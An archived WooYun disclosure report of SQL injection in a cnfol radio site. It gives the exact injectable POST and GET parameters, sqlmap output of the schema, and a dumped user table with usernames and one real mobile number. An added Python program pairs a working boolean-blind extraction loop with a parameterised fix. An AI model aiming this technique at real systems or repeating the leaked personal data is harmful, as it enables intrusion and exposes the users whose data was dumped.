WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --------------------------- http://drop.zone.ci/
Disclosure timeline:
2015-08-15: Details reported to the vendor; awaiting vendor response
2015-08-17: Vendor confirmed; details visible to the vendor only
2015-08-27: Details opened to core white hats and relevant domain experts
2015-09-06: Details opened to regular white hats
2015-09-16: Details opened to intern white hats
2015-10-01: Details opened to the public

Exposed data: mobile numbers + email addresses

POST injection (parameter: offset)
POST /index.php?r=Radiostation/MoreMingjia HTTP/1.1
Content-Length: 12
Content-Type: application/x-www-form-urlencoded
Referer: http://radio.3g.cnfol.com/
Host: radio.3g.cnfol.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

offset=1
database management system users privileges:
[*] %fol_g3zbrd% [1]:
    privilege: USAGE

available databases [3]:
[*] cnfol_zjcj
[*] information_schema
[*] test

Database: cnfol_zjcj
[38 tables]
+---------------------+
| Activity            |
| Bl_Install          |
| Bl_Keywords         |
| Bl_Reflex           |
| Bl_UserMobile       |
| Bl_classify         |
| Bl_contentfilter    |
| Bl_resource         |
| Bl_user             |
| GK_AttenList        |
| Invitation          |
| InvitationCode      |
| InvitationExchange  |
| WdtVoice            |
| WdtVoiceCount       |
| backupZjcj_group    |
| bk_blacklist        |
| bk_flower           |
| bk_group            |
| bk_live             |
| bl_con              |
| bl_ref              |
| bl_secret           |
| syslog              |
| tbAppStock          |
| tbUserStockOptional |
| unscramble          |
| unscramblexx        |
| weidiantai1         |
| zjcj_androiddevice  |
| zjcj_content        |
| zjcj_content_201507 |
| zjcj_group          |
| zjcj_iosdevice      |
| zjcj_operate        |
| zjcj_user           |
| zjcj_userchat       |
| zjcj_userjoin       |
+---------------------+
Sample of the dumped user table (email addresses redacted by the archive, mobile numbers shown as dumped):

+-----------------+--------------+-------------+-------------+-------------+--------+
| email           | userName     | userNick    | replyNumber | mobile      | manage |
+-----------------+--------------+-------------+-------------+-------------+--------+
| [email protected] | pzpz         | pzpz        | 0           | <blank>     | 1      |
| <blank>         | 5518         | 天顺居士    | 0           | <blank>     | 0      |
| <blank>         | woshishui    | chaochao    | 0           | <blank>     | 0      |
| <blank>         | qiyongwei123 | qiyw        | 0           | <blank>     | 0      |
| [email protected] | blog         | blog1       | 0           | <blank>     | 1      |
| [email protected] | buluo        | buluo       | 0           | <blank>     | 0      |
| [email protected] | sq           | 舒淇        | 0           | <blank>     | 0      |
| [email protected] | ds           | 大S         | 0           | <blank>     | 0      |
| <blank>         | wqh          | wqh         | 0           | <blank>     | 0      |
| <blank>         | kx           | 开心果      | 0           | <blank>     | 0      |
| <blank>         | ly           | 驴行天下1   | 0           | <blank>     | 0      |
| [email protected] | hihi         | hihi        | 0           | <blank>     | 1      |
| <blank>         | ns           | 超级女生    | 0           | <blank>     | 0      |
| [email protected] | bdjs         | bdjs        | 0           | <blank>     | 0      |
| <blank>         | syatao       | syatao      | 0           | <blank>     | 0      |
| [email protected] | sp           | 水皮1       | 0           | <blank>     | 0      |
| <blank>         | fomu998      | 灯下读贴    | 0           | <blank>     | 0      |
| <blank>         | 66236F       | 662368      | 0           | <blank>     | 0      |
| <blank>         | zzm680920    | 吉利一尘    | 0           | <blank>     | 0      |
| <blank>         | gaofenger    | gaofenger   | 0           | <blank>     | 0      |
| <blank>         | jmlu62426    | mingming405 | 0           | <blank>     | 0      |
| <blank>         | jack_cchen   | jackcchen   | 0           | <blank>     | 0      |
| <blank>         | aris2370     | aris2370    | 0           | <blank>     | 0      |
| <blank>         | tigerhu188   | 金天传奇    | 0           | <blank>     | 0      |
| <blank>         | nec511       | 冷 心       | 0           | <blank>     | 0      |
| <blank>         | gaoshang99   | gaoshang99  | 0           | <blank>     | 0      |
| <blank>         | A9818        | 剑杰8       | 0           | <blank>     | 0      |
| <blank>         | lw520165     | saxon鱼     | 0           | <blank>     | 0      |
| <blank>         | pigliwu      | 中金用户PH  | 0           | <blank>     | 0      |
| <blank>         | lifhaihe     | lftj        | 0           | 13821389989 | 0      |
| <blank>         | x46134587    | 温暖梦想    | 0           | <blank>     | 0      |
| <blank>         | sabatilla    | sabatilla   | 0           | <blank>     | 0      |
| <blank>         | wgx168       | wgx168      | 0           | <blank>     | 0      |
| <blank>         | laoynihao    | 逍遥啊鹰    | 0           | <blank>     | 0      |
| <blank>         | wwyymm2005   | 肥肥2005    | 0           | <blank>     | 0      |
=========================================================
Another injection point
http://radio.3g.cnfol.com/index-test.php?id=&r=Radiostation/Dragonfly
Injectable parameter: id (GET)
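The report shows only sqlmap output, not the server-side code, so the following program is an added illustration (not cnfol's code) of the defect common to both findings: a paging or record parameter (the POST offset above, the GET id here) spliced into the SQL text, next to a hardened handler that validates and binds it. It also walks through how a boolean-based blind injection turns such a parameter into an oracle that reads other tables, which is the kind of access the dump above demonstrates. Table and column names are borrowed from the dump; the rows are constructed, and the page URL handler name MoreMingjia is reused only as a function name. SQLite is used so it runs offline; the listed databases (information_schema, test) and the USAGE privilege suggest the real backend is MySQL, which unlike SQLite does not accept expressions in LIMIT/OFFSET, so the concrete payload differs there even though the defect and the fix are identical.

```python
import re
import sqlite3

PAGE_SIZE = 2


def make_db():
    """Constructed sample data; names follow the report's dump, values are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE zjcj_user (userName TEXT, email TEXT, mobile TEXT, manage INTEGER);
        INSERT INTO zjcj_user VALUES
            ('pzpz',      'pzpz@example.invalid', '',            1),
            ('5518',      '',                     '',            0),
            ('lifhaihe',  '',                     '13800000000', 0);
        CREATE TABLE WdtVoice (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO WdtVoice (title) VALUES ('a'), ('b'), ('c'), ('d'), ('e');
        """
    )
    return conn


def more_mingjia_vulnerable(conn, offset):
    """Hypothetical vulnerable handler: the raw 'offset' form field is pasted
    into the statement, so anything the database parses as an expression runs
    with the application's privileges."""
    sql = "SELECT title FROM WdtVoice ORDER BY id LIMIT %d OFFSET %s" % (PAGE_SIZE, offset)
    return [row[0] for row in conn.execute(sql)]


def is_valid_offset(offset):
    """Only a plain non-negative decimal integer is an acceptable page offset."""
    return isinstance(offset, str) and re.fullmatch(r"[0-9]+", offset) is not None


def more_mingjia_fixed(conn, offset):
    """Hardened handler: validate the type, then bind the value as a parameter
    so it can never be parsed as SQL."""
    if not is_valid_offset(offset):
        raise ValueError("offset must be a non-negative integer")
    sql = "SELECT title FROM WdtVoice ORDER BY id LIMIT ? OFFSET ?"
    return [row[0] for row in conn.execute(sql, (PAGE_SIZE, int(offset)))]


def blind_probe(fetch, condition):
    """Boolean oracle: when the condition holds, OFFSET becomes 0 and the page
    has rows; otherwise OFFSET is pushed past the table and the page is empty.
    'fetch' is the page function under test (here the vulnerable handler)."""
    payload = "CASE WHEN (%s) THEN 0 ELSE 1000 END" % condition
    return len(fetch(payload)) > 0


def blind_extract(fetch, scalar_sql, max_len=40):
    """Recover the string returned by scalar_sql one character at a time
    through the oracle, the way sqlmap's boolean-based blind technique does.
    Stops at the first position with no matching printable character."""
    out = ""
    for pos in range(1, max_len + 1):
        found = None
        for code in range(32, 127):
            cond = "unicode(substr((%s), %d, 1)) = %d" % (scalar_sql, pos, code)
            if blind_probe(fetch, cond):
                found = chr(code)
                break
        if found is None:
            break
        out += found
    return out


if __name__ == "__main__":
    conn = make_db()
    vuln = lambda p: more_mingjia_vulnerable(conn, p)
    print("normal page:", vuln("1"))
    print("admin email via blind injection:",
          blind_extract(vuln, "SELECT email FROM zjcj_user WHERE manage = 1 ORDER BY userName LIMIT 1"))
    print("fixed handler accepts '1':", more_mingjia_fixed(conn, "1"))
    print("fixed handler accepts payload:", is_valid_offset("CASE WHEN (1=1) THEN 0 ELSE 1000 END"))
```

The extraction loop is deliberately linear so the mechanism stays visible; a real tool narrows each character by binary search on the code point, which is why sqlmap can dump a 38-table schema through a single boolean oracle in reasonable time. The fix is the standard one for every parameter that reaches SQL: reject anything outside the expected type before the query is built, and pass the value as a bound parameter rather than as query text, which covers the GET id at the second URL as well.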
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-08-17 09:20
Vendor response: Thanks, we will fix the vulnerability immediately.
None yet